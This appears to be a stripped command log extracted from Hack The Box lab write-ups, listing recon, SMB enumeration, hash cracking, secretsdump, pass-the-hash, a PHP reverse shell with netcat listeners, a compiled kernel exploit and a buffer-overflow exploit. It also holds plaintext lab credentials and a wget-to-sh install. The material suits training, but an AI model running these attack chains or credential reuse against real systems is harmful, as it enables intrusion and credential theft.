ip=10.10.14.48 port=9005 course=2
Easy/26.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Teacher] → nc -lvnp 9005
Easy/26.html: → hash-identifier
Easy/11.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40
Easy/28.html: → nmap -F 10.10.10.123
Easy/28.html: → nmap -sC -sV 10.10.10.123 -p 21,22,53,80,139,443,445
Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbmap -H 10.10.10.123 -p 445,139
Easy/28.html:→ enum4linux 10.10.10.123
Easy/28.html:→ smbclient \\\\10.10.10.123\\general
Easy/28.html:→ mv creds.txt Friendzone/creds.txt
Easy/28.html:→ mkdir Friendzone
Easy/28.html:→ mv creds.txt Friendzone/creds.txt
Easy/28.html:→ cd Friendzone
Easy/28.html:→ cat creds.txt
Easy/28.html: → nmap 10.10.10.123 --script smb-enum-shares
Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → pacman -S blackarch/python2-dnsknife
Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → dig axfr @10.10.10.123 friendzone.red
Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → smbclient -H //10.10.10.123/Development
Easy/28.html:λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
Easy/28.html: λ root [ 10.10.14.48/23 ] [/home/nihilist/_HTB] → nc -lvnp 9001
Easy/36.html: → nmap -F 10.10.10.149
Easy/36.html: → nmap -sCV -p80,135,445 10.10.10.149
Easy/36.html: → git clone https://github.com/theevilbit/ciscot7
Easy/36.html: → cd ciscot7
Easy/36.html: → ls [21af318]
Easy/36.html: → python ciscot7.py -p 0242114B0E143F015F5D1E161713 [21af318]
Easy/36.html: → python ciscot7.py -p 02375012182C1A1D751618034F36415408 [21af318]
Easy/36.html: → echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' >> cis.md5 [21af318]
Easy/36.html: → cat cis.md5 [21af318]
Easy/36.html: → hashcat -m 500 [21af318]
Easy/36.html: → hashcat -m 500 cis.md5 /usr/share/wordlists/rockyou.txt [21af318]
Easy/36.html:→ nano users.txt
Easy/36.html:→ nano pass.txt
Easy/36.html:→ crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
Easy/36.html: → msfdb init
Easy/36.html: → msfconsole
Easy/36.html:→ locate psexec.py
Easy/36.html:→ cd /usr/share/doc/python3-impacket/examples/
Easy/36.html:→ ls
Easy/36.html:→ python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
Easy/36.html: → python3 lookupsid.py 'hazard:stealth1agent'@10.10.10.149
Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt
Easy/36.html: → git clone https://github.com/Hackplayers/evil-winrm
Easy/36.html: → cd evil-winrm
Easy/36.html: → cat Gemfile [e501272]
Easy/36.html: → gem install winrm winrm-fs stringio [e501272]
Easy/36.html: → sudo !! [e501272]
Easy/36.html: → sudo gem install winrm winrm-fs stringio [e501272]
Easy/36.html: → ruby evil-winrm.rb -u chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149 [e501272]
Easy/36.html: → wget https://download.sysinternals.com/files/SysinternalsSuite.zip
Easy/36.html: → mv ~/Downloads/SysinternalsSuite.zip .
Easy/36.html: → unzip SysinternalsSuite.zip
Easy/36.html: → strings firefox.exe_200218_153036.dmp | grep pass [e501272]
Easy/36.html: → crackmapexec smb 10.10.10.149 -u users.txt -p pass.txt --shares
Easy/36.html:→ python3 psexec.py administrator@10.10.10.149
Easy/31.html: → nmap -F 10.10.10.134
Easy/31.html: → nmap -sCV -p22,135,139,445 10.10.10.134
Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/] → smbclient -L //10.10.10.134/ -U ""
Easy/31.html: → smbclient //10.10.10.134/Backups
Easy/31.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bastion] → cat note.txt
Easy/31.html:→ mount -t cifs //10.10.10.134/Backups mount
Easy/31.html:→ ls && cd mount
Easy/31.html:→ ls
Easy/31.html: → smbmap -u nihilist -H 10.10.10.134
Easy/31.html: → ls
Easy/31.html: → ls
Easy/31.html: → du -hs WindowsImageBackup
Easy/31.html: → cd WindowsImageBackup
Easy/31.html: → cd L4mpje-PC
Easy/31.html: → ls
Easy/31.html: → cd Backup\ 2019-02-22\ 124351
Easy/31.html: → du -hs *
Easy/31.html: → guestmount
Easy/31.html: → apt install libguestfs-tools && guestmount --help
Easy/31.html: → mkdir /home/nihilist/_HTB/Bastion/vhd
Easy/31.html: → guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /home/nihilist/_HTB/Bastion/vhd
Easy/31.html: → cd /home/nihilist/_HTB/Bastion
Easy/31.html: → cd vhd
Easy/31.html: → ls
Easy/31.html:→ find Desktop Documents Downloads -ls
Easy/31.html: → cd ../..
Easy/31.html: → cd Windows/System32/config
Easy/31.html: → ls
Easy/31.html: → cp SAM SYSTEM /home/nihilist/_HTB/Bastion
Easy/31.html: → cd ../../../..
Easy/31.html: → ls
Easy/31.html: → file SAM SYSTEM
Easy/31.html: → mkdir backup && mv SAM backup/ && mv SYSTEM backup/
Easy/31.html: → cd backup
Easy/31.html: → ls
Easy/31.html: → impacket-secretsdump -sam SAM -system SYSTEM local
Easy/31.html:→ smbmap -u L4mpje -p aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9 -H 10.10.10.134
Easy/31.html:→ ssh L4mpje@10.10.10.134
Easy/31.html: → cd vhd
Easy/31.html: → ls
Easy/31.html: → cd Windows/System32/config
Easy/31.html: → ls -lash | grep SAM
Easy/31.html: → ls -lash | grep SYSTEM
Easy/31.html: → cd ../../..
Easy/31.html: → cd ..
Easy/31.html: → curl -sk https://raw.githubusercontent.com/411Hall/JAWS/master/jaws-enum.ps1 > jaws-enum.ps1
Easy/31.html: → ifconfig | grep inet
Easy/31.html: → python -m SimpleHTTPServer 8080
Easy/31.html:→ curl -sk https://raw.githubusercontent.com/haseebT/mRemoteNG-Decrypt/master/mremoteng_decrypt.py > mremoteng.py
Easy/31.html:→ python3 mremoteng.py
Easy/31.html: → python3 mremoteng.py -s yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB
Easy/31.html: → python3 mremoteng.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Easy/31.html:→ ssh Administrator@10.10.10.134
Easy/31.html: → ssh Administrator@10.10.10.134
Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.68
Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.68/
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nano rev.php
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → cat rev.php
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → curl -vsk http://10.10.10.68/uploads/rev.php
Easy/15.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → nc -lvnp 9001
Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → searchsploit kernel 4.4
Easy/15.html: λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → locate 44298.c
Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → cp /usr/share/exploitdb/exploits/linux/local/44298.c .
Easy/15.html:λ nihilist [ 10.10.14.48/23 ] [~/_HTB/Bashed] → gcc -o 44298 -m64 44298.c
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → ls
Easy/15.html:λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Bashed] → python2 -m SimpleHTTPServer 80
Easy/22.html: → nmap 10.10.10.98 -F
Easy/22.html:→ nmap -sCV 10.10.10.98
Easy/22.html:→ ftp 10.10.10.98
Easy/22.html:→ 7z x Access\ Control.zip
Easy/22.html:→ ls
Easy/22.html:→ file backup.mdb
Easy/22.html: → 7z x Access\ Control.zip -paccess4u@security
Easy/22.html: → ls
Easy/22.html: → file Access\ Control.pst
Easy/22.html: λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98
Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.75
Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → curl -vsk http://10.10.10.75/
Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → dirb http://10.10.10.75/nibbleblog/
Easy/16.html:λ nihilist [ 10.10.14.48/23 ] [~] → searchsploit Nibbleblog 4.0.3
Easy/16.html: λ nihilist [ 10.10.14.48/23 ] [~] → msfconsole
Easy/33.html: → nmap -F 10.10.10.138
Easy/33.html:→ nmap -sCV -p80 10.10.10.138
Easy/33.html: → echo '10.10.10.138 writeup.htb' >> /etc/hosts
Easy/33.html: → curl -sk http://writeup.htb/
Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
Easy/33.html: → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
Easy/33.html: → nikto -h http://10.10.10.138/
Easy/33.html: → curl -sk http://10.10.10.138/robots.txt
Easy/33.html: → curl -sk http://10.10.10.138/writeup/ | grep CMS
Easy/33.html:→ searchsploit CMS Made Simple | grep Injection
Easy/33.html:→ locate 46635.py
Easy/33.html:→ cp /usr/share/exploitdb/exploits/php/webapps/46635.py .
Easy/33.html:→ nano 46635.py
Easy/33.html:→ python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt
Easy/33.html: → ssh jkr@writeup.htb
Easy/33.html:→ cat nihilist.py
Easy/33.html:→ python -m SimpleHTTPServer 8080
Easy/33.html:→ nc -lvnp 1234
Easy/33.html: → ssh jkr@10.10.10.138
Easy/33.html:→ nc -lvnp 1234
Easy/35.html: → nmap -F 10.10.10.147 --top-ports 10000 -vvv
Easy/35.html: → nmap -sCV -p22,80,1337 10.10.10.147
Easy/35.html: → nikto -h http://10.10.10.147/
Easy/35.html: → dirsearch -u http://10.10.10.147/ -e php,html,txt,js
Easy/35.html: → ls
Easy/35.html: → file myapp
Easy/35.html: → chmod +x myapp
Easy/35.html: → gdb ./myapp
Easy/35.html:→ wget -q -O- https://github.com/hugsy/gef/raw/master/scripts/gef.sh | sh
Easy/35.html:→ gdb -q myapp
Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000
Easy/35.html:$rsp : 0x00007fffffffe438 → "AAAAAAAA"
Easy/35.html:$rsi : 0x00000000004052a0 → "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
Easy/35.html:$rip : 0x00000000004011ac → <main+77> ret
Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001
Easy/35.html:0x00007fffffffe448│+0x0010: 0x00007fffffffe518 → 0x00007fffffffe774 → "/home/nihilist/_HTB/Safe/Ghidra/myapp"
Easy/35.html:0x00007fffffffe458│+0x0020: 0x000000000040115f → <main+0> push rbp
Easy/35.html:0x00007fffffffe470│+0x0038: 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html: → 0x4011ac <main+77> ret
Easy/35.html:[#0] 0x4011ac → main()
Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000
Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
Easy/35.html:$rip : 0x00000000004011ac → <main+77> ret
Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001
Easy/35.html: → 0x4011ac <main+77> ret
Easy/35.html:[#0] 0x4011ac → main()
Easy/35.html:$rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
Easy/35.html:$rdx : 0x00007ffff7fad580 → 0x0000000000000000
Easy/35.html:$rsp : 0x00007fffffffe438 → "paaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaava[...]"
Easy/35.html:$rsi : 0x00000000004052a0 → "aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaaga[...]"
Easy/35.html:$rip : 0x00000000004011ac → <main+77> ret
Easy/35.html:$r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html:$r13 : 0x00007fffffffe510 → 0x0000000000000001
Easy/35.html: → python -c 'print "X"*128 + "Y"*8 + "Z"*8'
Easy/35.html: $rcx : 0x00007ffff7edc904 → 0x5477fffff0003d48 ("H="?)
Easy/35.html: $rdx : 0x00007ffff7fad580 → 0x0000000000000000
Easy/35.html: $rsp : 0x00007fffffffe438 → "XXXXXXXXYYYYYYYYZZZZZZZZ"
Easy/35.html: $rsi : 0x00000000004052a0 → "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX[...]"
Easy/35.html: $rip : 0x00000000004011ac → <main+77> ret
Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html: $r13 : 0x00007fffffffe510 → 0x0000000000000001
Easy/35.html:→ nano exploit.py
Easy/35.html: $rsp : 0x00007fff98990520 → 0x0000000000000001
Easy/35.html: $rip : 0x00007fd2a202e090 → <_start+0> mov rdi, rsp
Easy/35.html: 0x00007fff98990528│+0x0008: 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
Easy/35.html: 0x00007fff98990538│+0x0018: 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
Easy/35.html: 0x00007fff98990540│+0x0020: 0x00007fff9899276c → "APPIMAGE=/tmp/tm"
Easy/35.html: 0x00007fff98990548│+0x0028: 0x00007fff9899277d → "COLORTERM=truecolor"
Easy/35.html: 0x00007fff98990550│+0x0030: 0x00007fff98992791 → "DISPLAY=:0.0"
Easy/35.html: 0x00007fff98990558│+0x0038: 0x00007fff9899279e → "HOME=/root"
Easy/35.html: → 0x7fd2a202e090 <_start+0> mov rdi, rsp
Easy/35.html: [#0] 0x7fd2a202e090 → _start()
Easy/35.html: $rax : 0x000000000040115f → <main+0> push rbp
Easy/35.html: $rcx : 0x00007fd2a2007718 → 0x00007fd2a2009a40 → 0x0000000000000000
Easy/35.html: $rdx : 0x00007fff98990538 → 0x00007fff98992750 → "APPDIR=/tmp/.mount_tmtxDoJV"
Easy/35.html: $rsp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
Easy/35.html: $rbp : 0x00007fff98990440 → 0x00000000004011b0 → <__libc_csu_init+0> push r15
Easy/35.html: $rsi : 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
Easy/35.html: $rip : 0x0000000000401163 → <main+4> sub rsp, 0x70
Easy/35.html: $r8 : 0x00007fd2a2009a50 → 0x0000000000000004
Easy/35.html: $r9 : 0x00007fd2a203c780 → <_dl_fini+0> push rbp
Easy/35.html: $r12 : 0x0000000000401070 → <_start+0> xor ebp, ebp
Easy/35.html: $r13 : 0x00007fff98990520 → 0x0000000000000001
Easy/35.html: 0x00007fff98990440│+0x0000: 0x00000000004011b0 → <__libc_csu_init+0> push r15 ← $rsp, $rbp
Easy/35.html: 0x00007fff98990448│+0x0008: 0x00007fd2a1e74bbb → <__libc_start_main+235> mov edi, eax
Easy/35.html: 0x00007fff98990458│+0x0018: 0x00007fff98990528 → 0x00007fff98992748 → 0x00707061796d2f2e ("./myapp"?)
Easy/35.html: 0x00007fff98990468│+0x0028: 0x000000000040115f → <main+0> push rbp
Easy/35.html: → 0x401163 <main+4> sub rsp, 0x70
Easy/35.html: [#0] 0x401163 → main()
Easy/35.html:→ 0x401163 <main+4> sub rsp, 0x70
Easy/35.html:→ objdump -D myapp | grep -i system
Easy/35.html: → objdump -D myapp | grep -i test
Easy/35.html: → nano exploit.py
Easy/35.html: → python3 exploit.py
Easy/35.html:→ ssh-keygen -f safe
Easy/35.html:→ chmod 600 safe
Easy/35.html:→ cat safe.pub
Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:MyPasswords.kdbx .
Easy/35.html: → scp -i ../Ghidra/safe user@10.10.10.147:IMG_0547.JPG .
Easy/35.html: → ls
Easy/35.html: → file MyPasswords.kdbx
Easy/35.html: → file IMG_0547.JPG
Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g"
Easy/35.html:→ /usr/sbin/keepass2john MyPasswords.kdbx | sed "s/MyPasswords/IMG_0547.JPG/g" > keepass_hash
Easy/35.html: → john -w:/usr/share/wordlists/rockyou.txt keepass_hash
Easy/5.html:**λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8**
Easy/5.html: **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/**
Easy/5.html: **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto**
Easy/34.html: → nmap -F 10.10.10.115
Easy/34.html: → nmap -sCV -p22,80 10.10.10.115
Easy/34.html:→ echo "10.10.10.115 haystack.htb" >> /etc/hosts
Easy/34.html: → dirsearch -u http://10.10.10.115/ -t 50 -e txt,php,html,js
Easy/34.html:→ nikto -h http://haystack.htb/
Easy/34.html: → curl -sk http://haystack.htb/robots.txt | grep nginx
Easy/34.html: → wget http://haystack.htb/needle.jpg
Easy/34.html: → exiftool needle.jpg
Easy/34.html: → strings needle.jpg
Easy/34.html: → echo "bGEgYWd1amEgZW4gZWwgcGFqYXIgZXMgImNsYXZlIg==" | base64 -d
Easy/34.html: → nmap -F 10.10.10.115 --top-ports 10000 -vvv
Easy/34.html: → nmap -sCV -p9200 10.10.10.115
Easy/34.html: → curl -sk http://haystack.htb:9200
Easy/34.html: → curl -sk http://haystack.htb:9200/_cat/indices/\?v
Easy/34.html:→ curl -X POST http://haystack.htb:9200/\/_search
Easy/34.html:→ curl -X POST http://haystack.htb:9200/bank/_search
Easy/34.html:→ npm install elasticdump -g
Easy/34.html:→ elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data
Easy/34.html: → cat quotes.json| grep clave
Easy/34.html: → echo "cGFzczogc3BhbmlzaC5pcy5rZXk=" | base64 -d
Easy/34.html: → echo "dXNlcjogc2VjdXJpdHkg" | base64 -d
Easy/34.html: → ssh security@haystack.htb
Easy/34.html:→ nano nihilist.js
Easy/34.html:→ python -m SimpleHTTPServer 8080
Easy/34.html:→ cat nihilist.js
Easy/34.html:→ nc -lvnp 9001
Easy/34.html:→ nc -lvnp 9001
Easy/34.html: → nc -lvnp 9002